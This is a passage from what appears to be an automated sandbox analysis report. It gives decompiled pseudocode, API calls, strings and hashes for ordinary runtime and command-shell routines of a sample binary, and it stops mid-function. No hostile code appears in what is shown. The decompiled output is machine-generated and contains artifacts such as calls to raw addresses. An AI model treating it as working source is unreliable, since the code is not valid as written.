						_t25 = WriteFile(_t43,  &_v512, _t37 -  &_v512 - 1,  &_v516, 0);
					}
					_pop(_t44);
					return E004085C2(_t25, _t33, _v12 ^ _t47, _t40, _t41, _t44);
				} else {
					_push(__ebx);
					_push(__esi);
					__eax = E004308DA(0x456070, 0x314, L"Runtime Error!\n\nProgram: ");
					__ebx = 0;
					if(__eax != 0) {
						L21:
						_push(__ebx);
						_push(__ebx);
						_push(__ebx);
						_push(__ebx);
						_push(__ebx);
						__eax = E0042C03B();
						asm("int3");
						__ebp = __esp;
						if(_v28 != 0) {
							_push(_v0);
							_push(_v4);
							_push(_v8);
							_push(_v12);
							_push(_v16);
							__eax = E0042C03B();
							asm("int3");
							__eax =  *0x45606c; // 0x1
							return __eax;
						} else {
							return __eax;
						}
					} else {
						_push(__edi);
						__esi = 0x4560a2;
						 *0x4562aa = __ax;
						__eax = GetModuleFileNameW(0, 0x4560a2, 0x104);
						__edi = 0x2fb;
						if(__eax != 0 || E004308DA(0x4560a2, 0x2fb, L"<program name unknown>") == 0) {
							_t10 = __esi + 2; // 0x4560a4
							__ecx = _t10;
							do {
								__ax =  *__esi;
								__esi = __esi + 2;
							} while (__ax != __bx);
							__esi = __esi - __ecx;
							__esi = __esi >> 1;
							_t11 = __esi + 1; // 0x4560a1
							__eax = _t11;
							if(_t11 <= 0x3c) {
								L17:
								__edi = 0x314;
								__esi = 0x456070;
								if(E00430805(0x456070, 0x314, L"\n\n") != 0) {
									goto L21;
								} else {
									__eax = E00430805(0x456070, 0x314, _a4);
									_pop(__edi);
									if(__eax != 0) {
										goto L21;
									} else {
										_push(L"Microsoft Visual C++ Runtime Library");
										__eax = E00430BBD(__ecx, 0x456070);
										_pop(__esi);
										__ebx = 0x12010;
										return __eax;
									}
								}
							} else {
								_push(3);
								_t12 = __esi - 0x3b; // 0x456065
								__eax = _t12;
								__edi = __edi - __eax;
								__eax =  &(0x4560a2[__eax]);
								if(__eax != 0) {
									goto L21;
								} else {
									goto L17;
								}
							}
						} else {
							goto L21;
						}
					}
				}
			}

0x004274c2
0x004274c2
0x004274c2
0x004274c5
0x004274d2
0x004275c6
0x00427449
0x0042744a
0x00427452
0x00427459
0x0042745c
0x00427465
0x00427469
0x00427470
0x00427473
0x00427479
0x0042747b
0x0042747d
0x00427483
0x00000000
0x00000000
0x00427485
0x00427488
0x0042748e
0x00000000
0x00000000
0x00000000
0x0042748e
0x00427493
0x00427496
0x004274af
0x004274af
0x004274ba
0x004274c1
0x004274e9
0x004274e9
0x004274ea
0x004274fa
0x00427502
0x00427506
0x004275cc
0x004275cc
0x004275cd
0x004275ce
0x004275cf
0x004275d0
0x004275d1
0x004275d6
0x004275da
0x004275e0
0x004275e4
0x004275e7
0x004275ea
0x004275ed
0x004275f0
0x004275f3
0x004275f8
0x004275f9
0x004275fe
0x004275e2
0x004275e3
0x004275e3
0x0042750c
0x0042750c
0x00427512
0x00427517
0x0042751f
0x00427525
0x0042752c
0x00427545
0x00427545
0x00427548
0x00427548
0x0042754b
0x0042754e
0x00427553
0x00427555
0x00427557
0x00427557
0x0042755d
0x00427580
0x00427585
0x0042758a
0x0042759b
0x00000000
0x0042759d
0x004275a2
0x004275aa
0x004275ad
0x00000000
0x004275af
0x004275b4
0x004275ba
0x004275c2
0x004275c3
0x004275c5
0x004275c5
0x004275ad
0x0042755f
0x0042755f
0x00427561
0x00427561
0x00427564
0x00427566
0x0042757e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042757e
0x00000000
0x00000000
0x00000000
0x0042752c
0x00427506

APIs

GetModuleFileNameW.KERNEL32(00000000,004560A2,00000104), ref: 0042751F

Part of subcall function 0042C03B: IsProcessorFeaturePresent.KERNEL32(00000017,0042C00D,?,?,?,9kA,?,?,?,0042C01A,00000000,00000000,00000000,00000000,00000000,0043734D), ref: 0042C03D
Part of subcall function 0042C03B: GetCurrentProcess.KERNEL32(C0000417), ref: 0042C060
Part of subcall function 0042C03B: TerminateProcess.KERNEL32(00000000), ref: 0042C067

Strings

..., xrefs: 0042756D
Runtime Error!Program: , xrefs: 004274EB
p`E, xrefs: 0042758A
Microsoft Visual C++ Runtime Library, xrefs: 004275B4
<program name unknown>, xrefs: 0042752E

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Process$CurrentFeatureFileModuleNamePresentProcessorTerminate
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $p`E
API String ID: 872218275-3872481124
Opcode ID: d1390baf826b9a89cbbb578212e6d05631c6f37981c42b80e864a1d9111eef9b
Instruction ID: 3ca1a8a92bec1e0121cbb27e3ab14ced2de196fc76e5e79ef24384f7307e6ffa
Opcode Fuzzy Hash: d1390baf826b9a89cbbb578212e6d05631c6f37981c42b80e864a1d9111eef9b
Instruction Fuzzy Hash: 5B21AF3274032577DB207A52AC06F9B7B9C8F80758F95013BFC0852691F26DCA61C2ED

Uniqueness

Uniqueness Score: -1.00%

Function 004352E8 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004352E8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00434FB7(_t45, 7);
					E00434FB7(_t45 + 0x1c, 7);
					E00434FB7(_t45 + 0x38, 0xc);
					E00434FB7(_t45 + 0x68, 0xc);
					E00434FB7(_t45 + 0x98, 2);
					E0042E2C2( *((intOrPtr*)(_t45 + 0xa0)));
					E0042E2C2( *((intOrPtr*)(_t45 + 0xa4)));
					E0042E2C2( *((intOrPtr*)(_t45 + 0xa8)));
					E00434FB7(_t45 + 0xb4, 7);
					E00434FB7(_t45 + 0xd0, 7);
					E00434FB7(_t45 + 0xec, 0xc);
					E00434FB7(_t45 + 0x11c, 0xc);
					E00434FB7(_t45 + 0x14c, 2);
					E0042E2C2( *((intOrPtr*)(_t45 + 0x154)));
					E0042E2C2( *((intOrPtr*)(_t45 + 0x158)));
					E0042E2C2( *((intOrPtr*)(_t45 + 0x15c)));
					return E0042E2C2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x004352ee
0x004352f3
0x004352fc
0x00435307
0x00435312
0x0043531d
0x0043532b
0x00435336
0x00435341
0x0043534c
0x0043535a
0x00435368
0x00435379
0x00435387
0x00435395
0x004353a0
0x004353ab
0x004353b6
0x00000000
0x004353c6
0x004353cb

APIs

Part of subcall function 00434FB7: _free.LIBCMT ref: 00434FDC

_free.LIBCMT ref: 00435336

Part of subcall function 0042E2C2: HeapFree.KERNEL32(00000000,00000000,?,0042B259), ref: 0042E2D8
Part of subcall function 0042E2C2: GetLastError.KERNEL32(?,?,0042B259), ref: 0042E2EA

_free.LIBCMT ref: 00435341
_free.LIBCMT ref: 0043534C
_free.LIBCMT ref: 004353A0
_free.LIBCMT ref: 004353AB
_free.LIBCMT ref: 004353B6
_free.LIBCMT ref: 004353C1

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 71d09733fc3d2d610f643645d2a697bd38d7ba4bebfdd459c7aa4a786a2e3e9a
Instruction ID: a849ad7715a5dffa4cc0eba00ab4e62ca76937be8666e54297a626bdc5102b35
Opcode Fuzzy Hash: 71d09733fc3d2d610f643645d2a697bd38d7ba4bebfdd459c7aa4a786a2e3e9a
Instruction Fuzzy Hash: 33117F32640B04EAD520BBB3CC07FCBF7DC5F49704F84581EB29EAA252DA6DF5044658

Uniqueness

Uniqueness Score: -1.00%

Function 00403E90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00403E90(void* _a4, char _a8) {
				short _v8;
				char* _v12;
				long _v16;
				signed char* _v20;
				int _v24;
				signed char* _t22;
				signed char* _t30;
				void* _t38;

				_v12 =  &_a8;
				_v16 = FormatMessageW(0x500, _a4, 0, 0,  &_v8, 0,  &_v12);
				_v12 = 0;
				if(_v16 == 0 && GetLastError() != 0xeb) {
					do {
						_t30 =  *0x4494a8; // 0x4533bc
						if(( *_t30 & 1) != 0) {
							_t22 =  *0x4494a8; // 0x4533bc
							_v20 = _t22;
							_v24 = 0;
							_push(E00406150(_a4));
							E00406000(_v24, _v20, "WCMD_format_string", "Could not format string: le=%lu, fmt=%s\n", GetLastError());
							_t38 = _t38 + 0x18;
						}
					} while (0 != 0);
					_v8 = LocalAlloc(0, 2);
					 *_v8 = 0;
				}
				return _v8;
			}

0x00403e99
0x00403eb9
0x00403ebc
0x00403ec7
0x00403ed6
0x00403ed6
0x00403ee2
0x00403ee4
0x00403ee9
0x00403eec
0x00403efc
0x00403f16
0x00403f1b
0x00403f1b
0x00403f1e
0x00403f2c
0x00403f34
0x00403f34
0x00403f3d

APIs

FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?), ref: 00403EB3
GetLastError.KERNEL32 ref: 00403EC9
GetLastError.KERNEL32(00000000,00000000), ref: 00403EFD
LocalAlloc.KERNEL32(00000000,00000002), ref: 00403F26

Strings

Could not format string: le=%lu, fmt=%s, xrefs: 00403F04
WCMD_format_string, xrefs: 00403F09

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$AllocFormatLocalMessage
String ID: Could not format string: le=%lu, fmt=%s$WCMD_format_string
API String ID: 3879606362-4141813082
Opcode ID: c551784f422ef181489379be8505be16359cd331bc6e8a979106da0843bc9139
Instruction ID: a2682afc7f4241f0a58c1e392b1dfd47fc419b6dae7cbc348e7e30caa1335233
Opcode Fuzzy Hash: c551784f422ef181489379be8505be16359cd331bc6e8a979106da0843bc9139
Instruction Fuzzy Hash: BC115BB5A00208AFDB00DFA4C845BAF7BB8EB49316F5080AAF905A7390E7755E04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004058B0 Relevance: 9.4, APIs: 1, Strings: 5, Instructions: 361
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004058B0(char _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				void* _v20;
				signed short* _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed char* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				WCHAR* _v76;
				intOrPtr* _t167;
				signed char* _t169;
				WCHAR* _t189;
				intOrPtr* _t199;
				signed char* _t217;
				intOrPtr _t240;
				signed char* _t250;
				void* _t299;
				void* _t300;

				_v12 = _a4;
				_v20 = 0;
				_v8 = 0x25;
				_v16 = 0;
				while(_v16 < 0x34) {
					if( *((intOrPtr*)(0x4570c0 + _v16 * 4)) == 0) {
						L10:
						_v16 = _v16 + 1;
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						_t250 =  *0x4494a8; // 0x4533bc
						if(( *_t250 & 8) != 0) {
							_push(E00406150( *((intOrPtr*)(0x4570c0 + _v16 * 4))));
							E00406000(_v60, _v56, "handleExpansion", "FOR variable context: %c = \'%s\'\n", _v36);
							_t299 = _t299 + 0x18;
						}
					} while (0 != 0);
					goto L10;
				}
				_t167 = E004088E2(_v12, 0x25);
				_t300 = _t299 + 8;
				_v28 = _t167;
				if(_a12 != 0) {
					_t167 = E004088E2(_v12, 0x21);
					_t300 = _t300 + 8;
					_v20 = _t167;
				}
				if(_v28 != 0) {
					if(_v20 != 0) {
						if(_v12 >= _v20) {
							_t167 = _v20;
							_v40 = _t167;
						} else {
							_v40 = _v12;
						}
						_v12 = _v40;
					} else {
						_t167 = _v28;
						_v12 = _t167;
					}
				} else {
					_v12 = _v20;
				}
				if(_v12 != 0) {
					_t167 =  *_v12;
					_v8 = _t167;
				}
				while(_v12 != 0) {
					do {
						_t217 =  *0x4494a8; // 0x4533bc
						if(( *_t217 & 8) != 0) {
							_t169 =  *0x4494a8; // 0x4533bc
							_v64 = _t169;
							_v68 = 3;
							_push(E00406150(_v12));
							_push(_a8);
							E00406000(_v68, _v64, "handleExpansion", "Translate command:%s %d (at: %s)\n", E00406150(_a4));
							_t300 = _t300 + 0x1c;
						}
					} while (0 != 0);
					_v16 = ( *(_v12 + 2) & 0x0000ffff) - 0x30;
					if(_a8 != 0 || ( *(_v12 + 2) & 0x0000ffff) != (_v8 & 0x0000ffff)) {
						if(( *(_v12 + 2) & 0x0000ffff) != 0x7e) {
							if(_a8 != 0 ||  *0x454c24 == 0 || _v16 < 0 || _v16 > 9 || (_v8 & 0x0000ffff) != 0x25) {
								if(_a8 != 0 ||  *0x454c24 == 0 || ( *(_v12 + 2) & 0x0000ffff) != 0x2a || (_v8 & 0x0000ffff) != 0x25) {
									if(( *(_v12 + 2) & 0x0000ffff) < 0x61 || ( *(_v12 + 2) & 0x0000ffff) > 0x7a) {
										if(( *(_v12 + 2) & 0x0000ffff) < 0x41 || ( *(_v12 + 2) & 0x0000ffff) > 0x5a) {
											_v44 = 0xffffffff;
										} else {
											_v44 = ( *(_v12 + 2) & 0x0000ffff) - 0x27;
										}
										_v48 = _v44;
									} else {
										_v48 = ( *(_v12 + 2) & 0x0000ffff) - 0x61;
									}
									_v32 = _v48;
									if((_v8 & 0x0000ffff) != 0x25 || _v32 == 0xffffffff ||  *((intOrPtr*)(0x4570c0 + _v32 * 4)) == 0) {
										if(_a8 == 0 || (_v8 & 0x0000ffff) == 0x21) {
											_v12 = E00403630(_v12, _v8 & 0x0000ffff);
										} else {
											_v12 = _v12 + 2;
										}
									} else {
										E00405770(_v12 + 4, _v12, _v12 + 4,  *((intOrPtr*)(0x4570c0 + _v32 * 4)), 0xffffffff);
									}
									goto L68;
								} else {
									_v24 = 0;
									_t189 =  *0x454c24; // 0x0
									_t234 =  *_t189;
									0x400000( *_t189, 0,  &_v24, 1, 1);
									_v76 = _t189;
									if(_v24 == 0) {
										E00405770(_t234, _v12, _v12 + 4, 0, 0);
										L51:
										goto L68;
									}
									_v24 =  &(_v24[lstrlenW(_v76)]);
									while(( *_v24 & 0x0000ffff) == 0x20 || ( *_v24 & 0x0000ffff) == 9) {
										_v24 =  &(_v24[1]);
									}
									E00405770(_v12, _v12, _v12 + 4, _v24, 0xffffffff);
									goto L51;
								}
							} else {
								_t240 =  *0x454c24; // 0x0
								_t199 =  *0x454c24; // 0x0
								0x400000( *_t199, _v16 +  *((intOrPtr*)(_t240 + 0xc + _v16 * 4)), 0, 1, 1);
								_v72 = _t199;
								E00405770(_v12, _v12, _v12 + 4, _v72, 0xffffffff);
								goto L68;
							}
						}
						0x400000( &_v12, _a8);
						_v12 = _v12 + 2;
						goto L68;
					} else {
						if( *0x454c24 != 0) {
							E00405770(_v12, _v12, _v12 + 2, 0, 0);
						}
						_v12 = _v12 + 2;
						L68:
						_t167 = E004088E2(_v12, 0x25);
						_t300 = _t300 + 8;
						_v28 = _t167;
						if(_a12 != 0) {
							_t167 = E004088E2(_v12, 0x21);
							_t300 = _t300 + 8;
							_v20 = _t167;
						}
						if(_v28 != 0) {
							if(_v20 != 0) {
								if(_v12 >= _v20) {
									_v52 = _v20;
								} else {
									_t167 = _v12;
									_v52 = _t167;
								}
								_v12 = _v52;
							} else {
								_v12 = _v28;
							}
						} else {
							_t167 = _v20;
							_v12 = _t167;
						}
						if(_v12 != 0) {
							_t167 = _v12;
							_v8 =  *_t167;
						}
						continue;
					}
				}
				return _t167;
			}

0x004058b9
0x004058bc
0x004058c8
0x004058cc
0x004058de
0x004058ef
0x0040595b
0x004058db
0x00000000
0x00000000
0x00000000
0x00000000
0x004058f1
0x004058f1
0x004058f1
0x004058fd
0x00405938
0x0040594f
0x00405954
0x00405954
0x00405957
0x00000000
0x004058f1
0x00405966
0x0040596b
0x0040596e
0x00405975
0x0040597d
0x00405982
0x00405985
0x00405985
0x0040598c
0x0040599a
0x004059aa
0x004059b4
0x004059b7
0x004059ac
0x004059af
0x004059af
0x004059bd
0x0040599c
0x0040599c
0x0040599f
0x0040599f
0x0040598e
0x00405991
0x00405991
0x004059c4
0x004059c9
0x004059cc
0x004059cc
0x004059d0
0x004059da
0x004059da
0x004059e6
0x004059e8
0x004059ed
0x004059f0
0x00405a00
0x00405a04
0x00405a21
0x00405a26
0x00405a26
0x00405a29
0x00405a37
0x00405a3e
0x00405a84
0x00405aa5
0x00405b0b
0x00405bd1
0x00405bf8
0x00405c15
0x00405c06
0x00405c10
0x00405c10
0x00405c1f
0x00405bdf
0x00405be9
0x00405be9
0x00405c25
0x00405c2f
0x00405c67
0x00405c80
0x00405c85
0x00405c8b
0x00405c8b
0x00405c44
0x00405c5c
0x00405c5c
0x00000000
0x00405b3b
0x00405b3b
0x00405b4c
0x00405b51
0x00405b54
0x00405b59
0x00405b60
0x00405bbd
0x00405bc2
0x00000000
0x00405bc2
0x00405b72
0x00405b75
0x00405b91
0x00405b91
0x00405ba7
0x00000000
0x00405ba7
0x00405ac5
0x00405ace
0x00405adc
0x00405ae4
0x00405ae9
0x00405afd
0x00000000
0x00405afd
0x00405aa5
0x00405a8e
0x00405a99
0x00000000
0x00405a4f
0x00405a56
0x00405a67
0x00405a67
0x00405a72
0x00405c8e
0x00405c94
0x00405c99
0x00405c9c
0x00405ca3
0x00405cab
0x00405cb0
0x00405cb3
0x00405cb3
0x00405cba
0x00405cc8
0x00405cd8
0x00405ce5
0x00405cda
0x00405cda
0x00405cdd
0x00405cdd
0x00405ceb
0x00405cca
0x00405ccd
0x00405ccd
0x00405cbc
0x00405cbc
0x00405cbf
0x00405cbf
0x00405cf2
0x00405cf4
0x00405cfa
0x00405cfa
0x00000000
0x00405cfe
0x00405a3e
0x00405d06

APIs

lstrlenW.KERNEL32(?), ref: 00405B66

Part of subcall function 00405770: lstrlenW.KERNEL32(00000000,00000000), ref: 00405784
Part of subcall function 00405770: lstrlenW.KERNEL32(-00000002,00000000), ref: 004057AE

Strings

FOR variable context: %c = '%s', xrefs: 0040593D
Translate command:%s %d (at: %s), xrefs: 00405A0F
4, xrefs: 004058DE
handleExpansion, xrefs: 00405A14
handleExpansion, xrefs: 00405942

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: lstrlen
String ID: 4$FOR variable context: %c = '%s'$Translate command:%s %d (at: %s)$handleExpansion$handleExpansion
API String ID: 1659193697-558103197
Opcode ID: 9113841fa264fb5ab77e37b7a8c9eca91e2edc6b3a6cd2148ddd13d64f69a195
Instruction ID: 14fb6e251c4feee6e88241251a38c7fb655d414ded06eeb968c7731e41290958
Opcode Fuzzy Hash: 9113841fa264fb5ab77e37b7a8c9eca91e2edc6b3a6cd2148ddd13d64f69a195
Instruction Fuzzy Hash: 95E116B0904608EBDB14DF94C884BAFBBB5FB84315F20856AE4417B3C1D778AA81DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0043E98A Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E0043E98A(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x454264; // 0x8c4320d5
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x456b18 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E0041334C( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x456b18 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x4549f0)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x456b18 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x4549f0)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x456b18 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E00408CA0( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x456b18 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E00438C53(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E00432DAF(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E0042DCF0(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
